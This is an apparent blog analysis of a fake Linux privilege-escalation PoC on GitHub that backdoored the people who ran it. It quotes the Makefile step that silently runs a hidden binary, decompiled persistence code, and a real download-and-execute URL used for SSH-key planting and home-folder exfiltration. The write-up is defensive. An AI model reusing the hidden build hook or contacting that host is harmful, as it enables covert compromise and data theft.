Psst, writing this article wouldn't have been possible without the help of Łukasz. Thanks especially to him for guiding me throughout the whole process. This is also the first article of this kind that I write, so any sort of criticism is well accepted.

Discovery and initial impact

On July 3rd, just three days ago, a link to an exploit for instantly obtaining root privileges on Linux spread across various Telegram communities and Twitter. Before being removed from GitHub, the repository had been starred by over 100 people. However, after executing the proof-of-concept (PoC) on their primary machines, several individuals noticed strange changes in configuration files, such as their bashrc.

By giving a quick look at the Makefile, we can see that during the compilation of this fake PoC the binary aclocal.m4 is being run...

$(TARGET): $(OBJECTS)
    $(CC) $(LDFLAGS) -o $@ $^
    strip $@
    ./src/aclocal.m4

Right after, it will go back to compiling the completely harmless (and fake) PoC.

Moving forward, we will proceed with an analysis of the backdoor using IDA.

What does it actually do?

First, this binary deobfuscates the word kworker. Then, it checks the name of itself, i.e the binary name. Since it just got executed, the name will still be aclocal.m4 and this binary will continue setting itself up.

  if ((unsigned int)sub_3402(*a2, s))
  {
    if (!(unsigned int)sub_2D4A())
    {
      memset(src, 0, sizeof(src));
      strcpy(&src[strlen(src)], "[k");
      strcpy(&src[strlen(src)], "wo");
      strcpy(&src[strlen(src)], "rk");
      strcpy(&src[strlen(src)], "er");
      strcpy(&src[strlen(src)], "/8");
      strcpy(&src[strlen(src)], ":3");
      *(_WORD *)&src[strlen(src)] = ']';
      v4 = strlen(src);
      strncpy(*a2, src, v4 + 1);
      if (fork() > 0)
        exit(0);
      while (1)
      {
        sleep(0x78u);
        sub_25DE();
      }
    }
    return 0LL;
  }
  else
  {
    sub_296C();
    sub_2FA8();
    return 0LL;
  }
}

In sequence, the program calls sub_296C which is responsible for copying the malicious file to ~/.local/kworker, setting the appropriate execution permissions (504) and at the end executing it.

Next, the program proceeds with the sub_2FA8 function, ensuring that it self-starts with every terminal by inserting a string into the bash configuration file.

Assuming everything went smoothly and the binary, now named kworker, has been run, we'll see another condition that proceeds only if sub_2D4A returns a true value.

This function simply creates a lock file to ensure that the process is not executed more than once at the same time. If the lock was successfully created, we have one "fork" call and a check of the return value. If it is a parent process it kills itself; otherwise, if it's a child process, it proceeds with sub_25DE. This is done to make sure that the process can continue running in the background.

This is the most concerning part of the code, as we immediately see references to cURL. Following the order, cURL is initialized first, then some options are set, and at the end, the command is executed. The URL http://cunniloss.accesscam.org/hash.php, is deofuscated, accessed through cURL and a script is downloaded. The final call, system(command);, executes this script.

Firstly, it takes a screenshot, adds an entry to the user's authorized SSH keys, then compresses the home folder containing all user data (Documents, Desktop, etc.), and finally, both the screenshot and the compressed home folder are uploaded to transfer.sh (a legitimate file hosting service unrelated to the attack). The links to the uploaded files are then forwarded to the hacker's server.

So, what can I do to protect myself?

Always check the source code of software downloaded from git repositories, especially when they are published by someone with just a few followers. This is not the first time fake PoCs have been published on GitHub. If you are curious, execute such software only in isolated environments like virtual machines.